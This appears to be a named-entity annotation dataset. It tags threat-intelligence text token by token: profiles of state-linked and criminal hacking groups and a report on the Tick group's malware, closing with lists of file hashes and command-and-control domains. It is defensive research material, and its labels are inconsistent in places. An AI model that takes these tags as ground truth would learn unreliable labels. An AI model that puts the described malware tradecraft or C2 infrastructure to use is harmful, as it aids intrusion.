+since O +at O +least O +2008 S-TIME +. O + +This O +group O +reportedly O +compromised O +the O +Democratic B-IDTY +National I-IDTY +Committee E-IDTY +starting O +in O +the O +summer O +of O +2015 S-TIME +. O + +PLATINUM S-APT +is O +an O +activity O +group O +that O +has O +targeted O +victims O +since O +at O +least O +2009 S-TIME +. O + +The O +group O +has O +focused O +on O +targets O +associated O +with O +governments S-IDTY +and O +related O +organizations S-IDTY +in O +South B-LOC +and I-LOC +Southeast I-LOC +Asia E-LOC +. O + +Poseidon B-APT +Group E-APT +is O +a O +Portuguese-speaking O +threat O +group O +that O +has O +been O +active O +since O +at O +least O +2005 S-TIME +. 
O + +The O +group O +has O +a O +history O +of O +using O +information O +exfiltrated O +from O +victims O +to O +blackmail O +victim O +companies O +into O +contracting O +the O +Poseidon B-APT +Group E-APT +as O +a O +security O +firm O +. O + +PROMETHIUM S-APT +is O +an O +activity O +group O +that O +has O +been O +active O +since O +at O +least O +2012 S-TIME +. O + +The O +group O +conducted O +a O +campaign O +in O +May B-TIME +2016 E-TIME +and O +has O +heavily O +targeted O +Turkish O +victims O +. O + +PROMETHIUM S-APT +has O +demonstrated O +similarity O +to O +another O +activity O +group O +called O +NEODYMIUM S-APT +due O +to O +overlapping O +victim O +and O +campaign O +characteristics O +. O + +APT33 S-APT +:O +Elfin S-APT +APT33 S-APT +is O +a O +suspected O +Iranian S-LOC +threat O +group O +that O +has O +carried O +out O +operations O +since O +at O +least O +2013 S-TIME +. O + +The O +group O +has O +targeted O +organizations O +across O +multiple O +industries O +in O +the O +United B-LOC +States E-LOC +, O +Saudi B-LOC +Arabia E-LOC +, O +and O +South B-LOC +Korea E-LOC +, O +with O +a O +particular O +interest O +in O +the O +aviation O +and O +energy O +sectors O +. O + +APT37 S-APT +:O +ScarCruft S-APT +, O +Reaper S-APT +, O +Group123 S-APT +, O +TEMP.Reaper S-APT +APT37 S-APT +is O +a O +suspected O +North B-LOC +Korean E-LOC +cyber O +espionage O +group O +that O +has O +been O +active O +since O +at O +least O +2012 S-TIME +. O + +The O +group O +has O +targeted O +victims O +primarily O +in O +South B-LOC +Korea E-LOC +, O +but O +also O +in O +Japan S-LOC +, O +Vietnam S-LOC +, O +Russia S-LOC +, O +Nepal S-LOC +, O +China S-LOC +, O +India S-LOC +, O +Romania S-LOC +, O +Kuwait S-LOC +, O +and O +other O +parts O +of O +the O +Middle B-LOC +East E-LOC +. 
O + +APT37 S-APT +has O +also O +been O +linked O +to O +following O +campaigns O +between O +2016-2018 S-TIME +: O +Operation B-ACT +Daybreak E-ACT +, O +Operation B-ACT +Erebus E-ACT +, O +Golden B-ACT +Time E-ACT +, O +Evil B-ACT +New I-ACT +Year E-ACT +, O +Are B-ACT +you I-ACT +Happy? E-ACT +, O +FreeMilk S-ACT +, O +Northern B-ACT +Korean I-ACT +Human I-ACT +Rights E-ACT +, O +and O +Evil B-ACT +New I-ACT +Year I-ACT +2018 E-ACT +. O + +APT38 S-APT +:O +APT38 S-APT +is O +a O +financially-motivated O +threat O +group O +that O +is O +backed O +by O +the O +North B-LOC +Korean E-LOC +regime O +. O + +The O +group O +mainly O +targets O +banks O +and O +financial O +institutions O +and O +has O +targeted O +more O +than O +16 O +organizations O +in O +at O +least O +13 O +countries O +since O +at O +least O +2014 S-TIME +. O +APT3 S-APT +: O +Gothic B-APT +Panda E-APT +, O +Pirpi S-APT +, O +UPS B-APT +Team E-APT +, O +Buckeye S-APT +, O +Threat B-APT +Group-0110 E-APT +, O +TG-0110 S-APT +. O + +APT3 S-APT +is O +a O +China S-LOC +based O +threat O +group O +that O +researchers O +have O +attributed O +to O +China's B-SECTEAM +Ministry I-SECTEAM +of I-SECTEAM +StateSecurity E-SECTEAM +. O + +This O +group O +is O +responsible O +for O +the O +campaigns O +known O +as O +Operation B-ACT +Clandestine I-ACT +Fox E-ACT +, O +Operation B-ACT +Clandestine I-ACT +Wolf E-ACT +, O +and O +Operation B-ACT +Double I-ACT +Tap E-ACT +. O + +As O +of O +June B-TIME +2015 E-TIME +, O +the O +group O +appears O +to O +have O +shifted O +from O +targeting O +primarily O +US S-LOC +victims O +to O +primarily O +political O +organizations O +in O +Hong B-LOC +Kong E-LOC +. O + +MITRE S-IDTY +has O +also O +developed O +an O +APT3 S-APT +Adversary O +Emulation O +Plan O +. O + +APT30 S-APT +is O +a O +threat O +group O +suspected O +to O +be O +associated O +with O +the O +Chinese B-IDTY +government E-IDTY +. 
O + +While O +Naikon S-APT +shares O +some O +characteristics O +with O +APT30 S-APT +, O +the O +two O +groups O +do O +not O +appear O +to O +be O +exact O +matches O +. O + +APT32 S-APT +: O +SeaLotus S-APT +, O +OceanLotus S-APT +, O +APT-C-00 S-APT +. O + +APT32 S-APT +is O +a O +threat O +group O +that O +has O +been O +active O +since O +at O +least O +2014 S-TIME +. O + +The O +group O +has O +targeted O +multiple O +private O +sector O +industries O +as O +well O +as O +with O +foreign O +governments O +, O +dissidents O +, O +and O +journalists O +with O +a O +strong O +focus O +on O +Southeast O +Asian O +countries O +like O +Vietnam S-LOC +, O +the B-LOC +Philippines E-LOC +, O +Laos S-LOC +, O +and O +Cambodia S-LOC +. O + +They O +have O +extensively O +used O +strategic B-TOOL +web I-TOOL +compromises E-TOOL +to O +compromise O +victims O +. O + +The O +group O +is O +believed O +to O +be O +Vietnam S-LOC +based O +. O + +FIN7 S-APT +: O +Carbanak B-APT +Group E-APT +. O + +FIN7 S-APT +is O +a O +financially-motivated O +threat O +group O +that O +has O +primarily O +targeted O +the O +U.S. S-LOC +retail O +, O +restaurant O +, O +and O +hospitality O +sectors O +since O +mid-2015 S-TIME +. O + +They O +often O +use O +point-of-sale S-TOOL +malware O +. O + +A O +portion O +of O +FIN7 S-APT +was O +run O +out O +of O +a O +front O +company O +called O +Combi B-IDTY +Security E-IDTY +. O + +FIN7 S-APT +is O +sometimes O +referred O +to O +as O +Carbanak B-APT +Group E-APT +, O +but O +these O +appear O +to O +be O +two O +groups O +using O +the O +same O +Carbanak S-MAL +malware O +and O +are O +therefore O +tracked O +separately O +. O + +FIN8 S-APT +is O +a O +financially O +motivated O +threat O +group O +known O +to O +launch O +tailored O +spearphishing S-ACT +campaigns O +targeting O +the O +retail O +, O +restaurant O +, O +and O +hospitality O +industries O +. 
O + +Gallmaker S-APT +is O +a O +cyberespionage O +group O +that O +has O +targeted O +victims O +in O +the O +Middle B-LOC +East E-LOC +and O +has O +been O +active O +since O +at O +least O +December B-TIME +2017 E-TIME +. O + +The O +group O +has O +mainly O +targeted O +victims O +in O +the O +defense O +, O +military O +, O +and O +government O +sectors O +. O + +DarkHydrus  S-APT  +is O +a O +threat O +group O +that O +has O +targeted O +government O +agencies O +and O +educational O +institutions O +in O +the O +Middle B-LOC +East E-LOC +since O +at O +least O +2016 S-TIME +. O + +The O +group O +heavily O +leverages O +open-source O +tools O +and O +custom O +payloads O +for O +carrying O +out O +attacks O +. O + +Deep B-APT +Panda E-APT +: O +Shell B-APT +Crew E-APT +, O +WebMasters S-APT +, O +KungFu B-APT +Kittens E-APT +, O +PinkPanther S-APT +, O +Black B-APT +Vine E-APT +. O + +Deep B-APT +Panda E-APT +is O +a O +suspected O +Chinese O +threat O +group O +known O +to O +target O +many O +industries O +, O +including O +government O +, O +defense O +, O +financial O +, O +and O +telecommunications O +. O + +The O +intrusion O +into O +healthcare O +company O +Anthem S-IDTY +has O +been O +attributed O +to Deep B-APT +Panda E-APT +. O + +This O +group O +is O +also O +known O +as O +Shell B-APT +Crew E-APT +, O +WebMasters S-APT +, O +KungFu B-APT +Kittens E-APT +, O +and O +PinkPanther S-APT +. O + +Deep B-APT +Panda E-APT also +appears O +to O +be O +known O +as O +Black B-APT +Vine E-APT +based O +on O +the O +attribution O +of O +both O +group O +names O +to O +the O +Anthem S-IDTY +intrusion O +. O + +Some O +analysts O +track Deep B-APT +Panda E-APT +and O +APT19 S-APT +as O +the O +same O +group O +, O +but O +it O +is O +unclear O +from O +open O +source O +information O +if O +the O +groups O +are O +the O +same O +. O + +Dragonfly S-APT +: O +Energetic B-APT +Bear E-APT +. 
O + +Dragonfly  S-APT  +is O +a O +cyber O +espionage O +group O +that O +has O +been O +active O +since O +at O +least O +2011 S-TIME +. O + +They O +initially O +targeted O +defense O +and O +aviation O +companies O +but O +shifted O +to O +focus O +on O +the O +energy O +sector O +in O +early O +2013 S-TIME +. O + +They O +have O +also O +targeted O +companies O +related O +to O +industrial O +control O +systems O +. O + +A O +similar O +group O +emerged O +in O +2015 S-TIME +and O +was O +identified O +by O +Symantec S-IDTY +as O +Dragonfly B-APT +2.0 E-APT +. O + +There O +is O +debate O +over O +the O +extent O +of O +the O +overlap O +between O +Dragonfly S-APT +and O +Dragonfly B-APT +2.0 E-APT +, O +but O +there O +is O +sufficient O +evidence O +to O +lead O +to O +these O +being O +tracked O +as O +two O +separate O +groups O +. O + +Dragonfly B-APT +2.0 E-APT +: O +Berserk B-APT +Bear E-APT +. O + +Dragonfly B-APT +2.0 E-APT +is O +a O +suspected O +Russian S-LOC +group O +that O +has O +targeted O +government B-IDTY +entities E-IDTY +and O +multiple O +U.S. S-LOC +critical B-IDTY +infrastructure I-IDTY +sectors E-IDTY +since O +at O +least O +March B-TIME +2016 E-TIME +. O + +There O +is O +debate O +over O +the O +extent O +of O +overlap O +between O +Dragonfly B-APT +2.0 E-APT +and O +Dragonfly S-APT +, O +but O +there O +is O +sufficient O +evidence O +to O +lead O +to O +these O +being O +tracked O +as O +two O +separate O +groups O +. O + +DragonOK S-APT +is O +a O +threat O +group O +that O +has O +targeted O +Japanese S-LOC +organizations S-IDTY +with O +phishing B-ACT +emails E-ACT +. O + +Due O +to O +overlapping O +TTPs O +, O +including O +similar O +custom O +tools O +, O +DragonOK S-APT +is O +thought O +to O +have O +a O +direct O +or O +indirect O +relationship O +with O +the O +threat O +group Moafee S-APT +. 
O + +It O +is O +known O +to O +use O +a O +variety O +of O +malware O +, O +including O +Sysget S-MAL +/ O +HelloBridge S-MAL +, O +PlugX S-MAL +, O +PoisonIvy S-MAL +, O +FormerFirstRat S-MAL +, O +NFlog S-MAL +, O +and O +NewCT S-MAL +. O + +Dust B-APT +Storm E-APT +is O +a O +threat O +group O +that O +has O +targeted O +multiple O +industries O +in O +Japan S-LOC +, O +South B-LOC +Korea E-LOC +, O +the O +United B-LOC +States E-LOC +, O +Europe S-LOC +, O +and O +several O +Southeast B-LOC +Asian I-LOC +countries E-LOC +. O + +CopyKittens  S-APT  +is O +an O +Iranian O +cyber O +espionage O +group O +that O +has O +been O +operating O +since O +at O +least O +2013 S-TIME +. O + +It O +has O +targeted O +countries O +including O +Israel S-LOC +, O +Saudi B-LOC +Arabia E-LOC +, O +Turkey S-LOC +, O +the O +U.S. S-LOC +, O +Jordan S-LOC +, O +and O +Germany S-LOC +. O + +Tick S-APT +Group O +Continues O +Attacks O +. O + +The O +" O +Tick S-APT +" O +group O +has O +conducted O +cyber B-ACT +espionage I-ACT +attacks E-ACT +against O +organizations O +in O +the O +Republic B-LOC +of I-LOC +Korea I-LOC +and I-LOC +Japan E-LOC +for O +several O +years O +. O + +The O +group O +focuses O +on O +companies O +that O +have O +intellectual O +property O +or O +sensitive O +information O +like O +those O +in O +the O +Defense B-IDTY +and I-IDTY +High-Tech E-IDTY +industries O +. O + +The O +group O +is O +known O +to O +use O +custom O +malware O +called O +Daserf S-MAL +, O +but O +also O +employs O +multiple B-TOOL +commodity E-TOOL +and O +custom B-TOOL +tools E-TOOL +, O +exploit O +vulnerabilities S-VULNAME +, O +and O +use O +social B-TOOL +engineering I-TOOL +techniques E-TOOL +. O + +With O +multiple B-TOOL +tools E-TOOL +and O +anonymous B-TOOL +infrastructure E-TOOL +, O +they O +are O +running O +longstanding O +and O +persistent O +attack B-ACT +campaigns E-ACT +. 
O + +We O +have O +observed O +that O +the O +adversary O +has O +repeatedly O +attacked O +a O +high-profile O +target O +in O +Japan S-LOC +using O +multiple O +malware B-MAL +families E-MAL +for O +the O +last O +three O +years O +. O + +Symantec S-SECTEAM +was O +first O +to O +publicly O +report O +on O +Tick S-APT +, O +followed O +by O +LAC S-SECTEAM +in O +2016 S-TIME +. O + +These O +reports O +discussed O +the O +group O +’s O +malware O +, O +Daserf S-MAL +( O +a.k.a O +Muirim S-MAL +or O +Nioupale S-MAL +) O +and O +some O +additional O +downloader O +programs O +. O + +Though O +Daserf S-MAL +wasn’t O +a O +popular O +attack O +tool O +at O +the O +time O +of O +publishing O +the O +two O +reports O +, O +it O +dates O +back O +to O +at O +least O +2011 S-TIME +. O + +Using O +AutoFocus S-SECTEAM +, O +we O +were O +able O +to O +identify O +the O +link O +among O +Daserf S-MAL +and O +two O +other O +threats O +, O +9002 S-MAL +and O +Invader S-MAL +. O + +These O +threats O +shared O +infrastructure O +between O +July B-TIME +2012 E-TIME +and O +April B-TIME +2013 E-TIME +. O + +Invader S-MAL +( O +a.k.a O +Kickesgo S-MAL +) O +is O +a O +backdoor O +that O +injects O +its O +main O +code O +into O +a O +legitimate O +process O +, O +such O +as O +explorer.exe S-FILE +, O +and O +has O +following O +functions O +: O + +Logs O +keystrokes O +and O +mouse O +movement O +Captures O +screenshots O +Opens O +cmd.exe S-FILE +shell O +Enumerates O +processes O +Executes O +programs O +Removes O +itself O +Enumerates O +all O +opening O +TCP S-PROT +and O +UDP O +ports O +. O + +9002 S-MAL +is O +the O +infamous O +RAT O +frequently O +seen O +in O +targeted O +attacks O +reported O +by O +various O +security O +vendors O +, O +including O +Palo B-SECTEAM +Alto I-SECTEAM +Networks E-SECTEAM +. 
O + +Interestingly O +, O +the O +C2 S-TOOL +servers O +linking O +9002 S-MAL +to O +Daserf S-MAL +were O +described O +in O +the O +report O +of O +an O +Adobe B-TOOL +Flash E-TOOL +Zero-day S-VULNAME +attack O +from O +FireEye S-SECTEAM +in O +2013 S-TIME +. O + +These O +domains O +were O +registered O +through O +the O +privacy O +protection O +services O +in O +2008 S-TIME +and O +2011 S-TIME +. O + +krjregh.sacreeflame.com S-DOM +lywja.healthsvsolu.com S-DOM +. O + +Though O +we O +don’t O +know O +the O +targets O +of O +these O +malware O +samples O +at O +the O +time O +of O +writing O +this O +article O +, O +we O +suspect O +the O +same O +group O +is O +behind O +these O +threats O +for O +a O +number O +of O +reasons O +. O + +The O +samples O +of O +Daserf S-MAL +that O +shared O +infrastructure O +were O +submitted O +to O +VirusTotal S-SECTEAM +only O +from O +Japan S-LOC +multiple O +times O +in O +2013 S-TIME +. O + +As O +noted O +in O +a O +later O +section O +, O +another O +Invader S-MAL +sample O +shared O +different O +C2 S-TOOL +servers O +with O +Daserf S-MAL +. O + +Symantec S-SECTEAM +reported O +that O +Tick S-APT +exploited O +additional O +Adobe B-TOOL +Flash E-TOOL +and O +Microsoft B-TOOL +Office E-TOOL +vulnerabilities S-VULNAME +. O + +SecureWorks S-SECTEAM +said O +the O +adversary O +group O +is O +abusing O +a O +previously B-VULNAME +undisclosed I-VULNAME +vulnerability E-VULNAME +in O +Japanese O +Software O +Asset O +Management O +system O +on O +endpoints O +. O + +Therefore O +, O +Tick S-APT +or O +their O +digital O +quartermaster O +is O +capable O +of O +deploying O +new O +and O +unique O +exploits O +. O + +In O +July O +2016 O +, O +we O +identified O +a O +compromised O +website O +in O +Japan S-LOC +that O +was O +hosting O +a O +Daserf B-MAL +variant E-MAL +. 
O + +The O +web O +server O +was O +also O +a O +C2 S-TOOL +server O +for O +another O +threat O +, O +Minzen S-MAL +( O +a.k.a O +, O +XXMM S-MAL +, O +Wali S-MAL +, O +or O +ShadowWali S-MAL +) O +. O + +The O +threat O +often O +uses O +compromised O +web O +servers O +in O +Japan S-LOC +and O +the O +Republic B-LOC +of I-LOC +Korea E-LOC +. O + +As O +Kaspersky S-SECTEAM +and O +Cybereason S-SECTEAM +recently O +posted O +, O +Minzen S-MAL +is O +a O +modular O +malware O +that O +has O +both O +32-bit O +and O +64-bit O +components O +in O +its O +resource O +section O +or O +configuration O +data O +in O +its O +body O +. O + +One O +of O +the O +Minzen S-MAL +samples O +( O +SHA256 S-ENCR +: O +9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2 S-SHA2 +) O +found O +in O +the O +Republic B-LOC +of I-LOC +Korea E-LOC +in O +December B-TIME +2016 E-TIME +installs O +simple O +backdoor O +module O +as O +a O +final O +payload O +on O +a O +compromised O +computer O +. O + +It O +opens O +a O +TCP S-PROT +port O +and O +receives O +commands O +from O +a O +remote O +attacker O +. O + +According O +to O +the O +debug O +path O +in O +the O +body O +, O +the O +author O +of O +the O +tool O +called O +it O +“ O +NamelessHdoor S-MAL +, O +” O +and O +its O +internal O +version O +is O +identified O +as O +“ O +V1.5. O +” O + +The O +payload O +is O +based O +on O +“ O +Nameless B-MAL +Backdoor E-MAL +” O +which O +has O +been O +publicly O +available O +for O +more B-TIME +than I-TIME +ten I-TIME +years E-TIME +. O + +The O +oldest O +code O +we O +could O +identify O +was O +hosted O +on O +a O +famous O +Chinese O +source O +code O +sharing O +site O +since O +2005 S-TIME +. 
O + +The O +author O +of O +the B-MAL +NamelessHdoor E-MAL +appears O +to O +have O +created O +additional O +versions O +of O +the O +Nameless B-MAL +Backdoor E-MAL +by O +removing O +unnecessary O +functions O +, O +and O +added O +open-source O +DLL S-TOOL +injection O +code O +from O +ReflectiveDLLLoader S-TOOL +. O + +There O +is O +minimal O +public O +information O +regarding O +the O +Nameless B-MAL +Backdoor E-MAL +, O +except O +for O +the O +interesting O +report O +from O +Cyphort S-SECTEAM +in O +2015 S-TIME +. O + +The O +researcher O +of O +the O +company O +analyzed O +multiple O +threats O +, O +including O +Invader S-MAL +, O +Nioupale S-MAL +(Daserf O +) O +and O +Hdoor S-MAL +found O +in O +an O +attack O +against O +an O +Asian O +financial O +institution O +. O + +We O +examined O +the O +sample O +described O +in O +the O +report O +as O +Hdoor S-MAL +and O +found O +it O +’s O +a O +previous O +version O +of O +the O +NamelessHdoor S-MAL +we O +discovered O +in O +the O +Minzen O +sample O +, O +but O +without O +support O +for O +DLL S-TOOL +injection O +. O + +It O +turned O +out O +that O +the O +DLL S-TOOL +files O +we O +found O +are O +a O +custom O +variant O +of O +Gh0st B-MAL +RAT E-MAL +, O +and O +the O +EXE O +files O +download O +the O +RAT O +. O + +Since O +the O +source O +code O +is O +publicly O +available O +, O +Gh0st B-MAL +RAT E-MAL +has O +been O +used O +by O +multiple O +actors O +for O +years O +. O + +The O +domain O +, O +softfix.co.kr S-DOM +was O +registered O +in O +2014 S-TIME +. O + +One O +of O +subdomains O +, O +news.softfix.co.kr S-DOM +was O +the O +C2 S-TOOL +server O +of O +Daserf S-MAL +( O +9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423 S-SHA2 +) O +. 
O + +Another O +subdomain O +, O +bbs.softfix.co.kr S-DOM +was O +hosted O +on O +same O +IP O +address O +as O +bbs.gokickes.com S-DOM +, O +which O +was O +reported O +as O +the O +C2 S-TOOL +server O +of O +Invader S-MAL +by O +Cyphort S-SECTEAM +. O + +We O +also O +identified O +www.gokickes.com S-DOM +was O +the O +C2 S-TOOL +of O +another O +Invader B-MAL +variant E-MAL +( O +57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb S-SHA2 +) O +. O + +In O +addition O +to O +the O +infrastructure O +, O +the O +attacker O +also O +shared O +code O +. O + +The O +Gh0st S-MAL +downloaders O +employ O +simple O +substitution O +ciphers O +for O +hiding O +strings O +. O + +We O +also O +identified O +another O +malware O +family O +, O +HomamDownloader S-MAL +, O +sharing O +some O +servers O +with O +Daserf S-MAL +. O + +An O +overview O +of O +the O +connections O +among O +these O +threats O +is O +discussed O +in O +below O +. O + +HomamDownloader S-MAL +is O +a O +small O +downloader O +program O +with O +minimal O +interesting O +characteristics O +from O +a O +technical O +point O +of O +view O +. O + +HomamDownloader S-MAL +was O +discovered O +to O +be O +delivered O +by O +Tick S-APT +via O +a O +spearphishing S-ACT +email S-TOOL +. O + +The O +adversary O +crafted O +credible O +email S-TOOL +and O +attachment O +after O +understanding O +the O +targets O +and O +their O +behavior O +. O + +The O +email S-TOOL +below O +was O +sent O +from O +a O +personal O +email S-TOOL +account O +with O +a O +subject O +line O +of O +“ O +New O +Year O +Wishes O +on O +January B-TIME +1st E-TIME +” O +. 
O + +The O +message O +asked O +the O +recipient O +to O +rename O +the O +attachment O +extension O +from O +“ O +._X_ S-FILE +” O +to O +“ O +.exe S-FILE +” O +and O +opening O +it O +with O +the O +password O +specified O +in O +the O +email S-TOOL +to O +view O +the O +Happy O +New O +Year O +eCard O +in O +the O +correct O +and O +polite O +language O +. O + +In O +addition O +to O +the O +social O +engineering O +email S-TOOL +technique O +, O +the O +attacker O +also O +employs O +a O +trick O +to O +the O +attachment O +. O + +The O +actor O +embedded O +malicious O +code O +to O +a O +resource O +section O +of O +the O +legitimate O +SFX O +file O +created O +by O +a O +file O +encryption O +tool O +, O +and O +modified O +the O +entry O +point O +of O +the O +program O +for O +jumping O +to O +the O +malicious O +code O +soon O +after O +the O +SFX O +program O +starts O +. O + +The O +malicious O +code O +drops O +HomamDownloader S-MAL +, O +then O +jumps O +back O +to O +the O +regular O +flow O +in O +the O +CODE O +section O +, O +which O +in O +turn O +asks O +the O +user O +the O +password O +and O +decrypts O +the O +file O +. O + +Therefore O +, O +once O +a O +user O +executes O +the O +attachment O +and O +sees O +the O +password O +dialog O +on O +SFX O +, O +the O +downloader O +dropped O +by O +the O +malicious O +code O +starts O +working O +even O +if O +the O +user O +chooses O +the O +Cancel O +on O +the O +password O +window O +. O + +Should O +the O +user O +become O +aware O +of O +the O +infection O +later O +, O +it O +may O +be O +difficult O +to O +find O +the O +cause O +due O +to O +the O +fact O +that O +the O +original O +embedded O +file O +contained O +within O +the O +SFX O +is O +benign O +. 
O + +Tick S-APT +was O +spotted O +last O +year O +, O +but O +they O +are O +actively O +and O +silently O +attacking O +various O +organizations O +in O +South B-LOC +Korea E-LOC +and O +Japan S-LOC +for O +a O +number O +of O +years O +. O + +While O +some O +of O +the O +group O +’s O +tools O +, O +tactics O +, O +and O +procedures O +( O +TTPs O +) O +have O +been O +covered O +within O +this O +article O +, O +it O +is O +likely O +there O +is O +much O +that O +still O +remains O +uncovered O +. O + +Daserf S-MAL +: O +04080fbab754dbf0c7529f8bbe661afef9c2cba74e3797428538ed5c243d705a S-SHA2 +. O + +Daserf S-MAL +: O +f8458a0711653071bf59a3153293771a6fb5d1de9af7ea814de58f473cba9d06 S-SHA2 +. O + +Daserf S-MAL +: O +e8edde4519763bb6669ba99e33b4803a7655805b8c3475b49af0a49913577e51 S-SHA2 +. O + +Daserf S-MAL +: O +21111136d523970e27833dd2db15d7c50803d8f6f4f377d4d9602ba9fbd355cd S-SHA2 +. O + +Daserf S-MAL +: O +9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423 S-SHA2 +. O + +Invader S-MAL +: O +0df20ccd074b722d5fe1358b329c7bdebcd7e3902a1ca4ca8d5a98cc5ce4c287 S-SHA2 +. O + +Invader S-MAL +: O +e9574627349aeb7dd7f5b9f9c5ede7faa06511d7fdf98804526ca1b2e7ce127e S-SHA2 +. O + +Invader S-MAL +: O +57e1d3122e6dc88d9eb2989f081de88a0e6864e767281d509ff58834928895fb S-SHA2 +. O +9002 S-MAL:933d66b43b3ce9a572ee3127b255b4baf69d6fdd7cb24da609b52ee277baa76e S-SHA2 +. O +9002 S-MAL:2bec20540d200758a223a7e8f7b2f98cd4949e106c1907d3f194216208c5b2fe S-SHA2 +. O +9002 S-MAL:055fe8002de293401852310ae76cb730c570f2037c3c832a52a79b70e2cb7831 S-SHA2 +. O + +Minzen S-MAL +: O +797d9c00022eaa2f86ddc9374f60d7ad92128ca07204b3e2fe791c08da9ce2b1 S-SHA2 +. O + +Minzen S-MAL +: O +9374040a9e2f47f7037edaac19f21ff1ef6a999ff98c306504f89a37196074a2 S-SHA2 +. O + +Minzen S-MAL +: O +26727d139b593486237b975e7bdf93a8148c52d5fb48d5fe540a634a16a6ba82 S-SHA2 +. O + +NamelessHdoor S-MAL +: O +dfc8a6da93481e9dab767c8b42e2ffbcd08fb813123c91b723a6e6d70196636f S-SHA2 +. 
O + +Gh0stRAt B-MAL +Downloader E-MAL +: O +ce47e7827da145823a6f2b755975d1d2f5eda045b4c542c9b9d05544f3a9b974 S-SHA2 +. O + +Gh0stRAt B-MAL +Downloader E-MAL +: O +e34f4a9c598ad3bb243cb39969fb9509427ff9c08e63e8811ad26b72af046f0c S-SHA2 +. O + +Custom B-MAL +Gh0st E-MAL +: O +8e5a0a5f733f62712b840e7f5051a2bd68508ea207e582a190c8947a06e26f40 S-SHA2 +. O + +Datper S-MAL +: O +7d70d659c421b50604ce3e0a1bf423ab7e54b9df361360933bac3bb852a31849 S-SHA2 +. O + +HomamDownloader S-MAL +: O +a624d2cd6dee3b6150df3ca61ee0f992e2d6b08b3107f5b00f8bf8bcfe07ebe7 S-SHA2 +. O + +C2 S-TOOL +: O +lywjrea.gmarketshop.net S-DOM +. O + +C2 S-TOOL +: O +krjregh.sacreeflame.com S-DOM +. O + +C2 S-TOOL +: O +psfir.sacreeflame.com S-DOM +. O + +C2 S-TOOL +: O +lywja.healthsvsolu.com S-DOM +. O + +C2 S-TOOL +: O +phot.healthsvsolu.com S-DOM +. O + +C2 S-TOOL +: O +blog.softfix.co.kr S-DOM +. O + +C2 S-TOOL +: O +news.softfix.co.kr S-DOM +. O + +C2 S-TOOL +: O +www.gokickes.com S-DOM +. O + +C2 S-TOOL +: O +log.gokickes.com S-DOM +. O + +The O +group O +is O +responsible O +for O +the O +campaign O +known O +as O +Operation B-ACT +Wilted I-ACT +Tulip E-ACT +. O + +Dark B-APT +Caracal E-APT  +is O +threat O +group O +that O +has O +been O +attributed O +to O +the O +Lebanese S-LOC +General B-IDTY +Directorate I-IDTY +of I-IDTY +General I-IDTY +Security E-IDTY +( O +GDGS S-IDTY +) O +and O +has O +operated O +since O +at O +least O +2012 S-TIME +. O + +Darkhotel  S-APT  +is O +a O +threat O +group O +that O +has O +been O +active O +since O +at O +least O +2004 S-TIME +. O + +The O +group O +has O +conducted O +activity O +on O +hotel O +and O +business O +center O +Wi‑Fi O +and O +physical O +connections O +as O +well O +as O +peer-to-peer O +and O +file O +sharing O +networks O +. O + +The O +actors O +have O +also O +conducted O +spearphishing S-ACT +. O + +Unknown O +. 
O + +Charming B-APT +Kitten E-APT  +is O +an O +Iranian O +cyber O +espionage O +group O +that O +has O +been O +active O +since O +approximately O +2014 S-TIME +. O + +They O +appear O +to O +focus O +on O +targeting O +individuals O +of O +interest O +to O +Iran S-LOC +who O +work O +in O +academic O +research O +, O +human O +rights O +, O +and O +media O +, O +with O +most O +victims O +having O +been O +located O +in O +Iran S-LOC +, O +the O +US B-LOC +, O +Israel S-LOC +, O +and O +the O +UK B-LOC +. O + +Charming B-APT +Kitten E-APT +usually O +tries O +to O +access O +private O +email S-TOOL +and O +Facebook S-IDTY +accounts O +, O +and O +sometimes O +establishes O +a O +foothold O +on O +victim O +computers O +as O +a O +secondary O +objective O +. O + +The O +group O +'s O +TTPs O +overlap O +extensively O +with O +another O +group O +, O +Magic B-APT +Hound E-APT +, O +resulting O +in O +reporting O +that O +may O +not O +distinguish O +between O +the O +two O +groups' O +activities O +. O + +Cleaver S-APT +: O +Threat B-APT +Group I-APT +2889 E-APT +, O +TG-2889 S-APT +. O + +Cleaver S-APT  +is O +a O +threat O +group O +that O +has O +been O +attributed O +to O +Iranian O +actors O +and O +is O +responsible O +for O +activity O +tracked O +as O +Operation B-ACT +Cleaver E-ACT +. O + +Strong O +circumstantial O +evidence O +suggests O +Cleaver S-APT +is O +linked O +to O +Threat B-APT +Group I-APT +2889 E-APT +( O +TG-2889 B-APT +) O +. O + +Cobalt B-APT +Group E-APT +: O +Cobalt B-APT +Gang E-APT +, O +Cobalt B-APT +Spider E-APT +. O + +Cobalt B-APT +Group E-APT  +is O +a O +financially O +motivated O +threat O +group O +that O +has O +primarily O +targeted O +financial O +institutions O +. O + +The O +group O +has O +conducted O +intrusions O +to O +steal O +money O +via O +targeting O +ATM B-TOOL +systems E-TOOL +, O +card O +processing O +, O +payment B-TOOL +systems E-TOOL +and O +SWIFT B-TOOL +systems E-TOOL +. 
O + +Cobalt B-APT +Group E-APT +has O +mainly O +targeted O +banks O +in O +Eastern B-LOC +Europe E-LOC +, O +Central B-LOC +Asia E-LOC +, O +and O +Southeast B-LOC +Asia E-LOC +. O + +One O +of O +the O +alleged O +leaders O +was O +arrested O +in O +Spain S-LOC +in O +early O +2018 S-TIME +, O +but O +the O +group O +still O +appears O +to O +be O +active O +. O + +The O +group O +has O +been O +known O +to O +target O +organizations O +in O +order O +to O +use O +their O +access O +to O +then O +compromise O +additional O +victims O +. O + +Reporting O +indicates O +there O +may O +be O +links O +between O +Cobalt B-APT +Group E-APT +and O +both O +the O +malware O +Carbanak S-MAL +and O +the O +group O +Carbanak S-APT +. O + +Taidoor S-APT +is O +a O +threat O +group O +that O +has O +operated O +since O +at O +least O +2009 S-TIME +and O +has O +primarily O +targeted O +the O +Taiwanese B-IDTY +government E-IDTY +. O + +TEMP.Veles S-APT +: O +XENOTIME S-APT +. O + +TEMP.Veles S-APT +is O +a O +Russia S-LOC +based O +threat O +group O +that O +has O +targeted O +critical O +infrastructure O +. O + +The O +group O +has O +been O +observed O +utilizing O +TRITON S-MAL +, O +a O +malware O +framework O +designed O +to O +manipulate O +industrial O +safety O +systems O +. O + +The B-APT +White I-APT +Company E-APT +is O +a O +likely O +state-sponsored O +threat O +actor O +with O +advanced O +capabilities O +. O + +From O +2017 B-TIME +through I-TIME +2018 E-TIME +, O +the O +group O +led O +an O +espionage 